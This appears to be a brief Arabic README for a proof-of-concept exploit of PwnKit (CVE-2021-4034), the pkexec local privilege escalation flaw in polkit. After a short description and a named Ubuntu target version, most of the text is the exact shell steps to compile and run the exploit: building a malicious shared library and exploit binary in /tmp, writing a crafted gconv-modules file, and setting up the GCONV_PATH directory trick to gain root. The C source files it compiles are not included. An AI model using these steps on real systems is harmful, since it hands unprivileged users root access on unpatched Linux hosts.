
PwnKit - ثغرة تصعيد الامتيازات المحلية المكتشفة في pkexec الخاص بـ polkit (CVE-2021-4034)
اكتشف فريق أبحاث Qualys ثغرة تلف في الذاكرة في pkexec الخاص بـ polkit، وهو برنامج SUID-root مثبت افتراضيًا على كل توزيعات لينكس الرئيسية. تسمح هذه الثغرة التي يسهل استغلالها لأي مستخدم غير مميز بالحصول على صلاحيات الجذر الكاملة على المضيف الضعيف من خلال استغلال هذه الثغرة في تكوينها الافتراضي.
PwnKit: ثغرة تصعيد الامتيازات المحلية المكتشفة في pkexec الخاص بـ polkit (CVE-2021-4034)
Ubuntu 20.04.3 LTS x86_64
إصدار pkexec 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit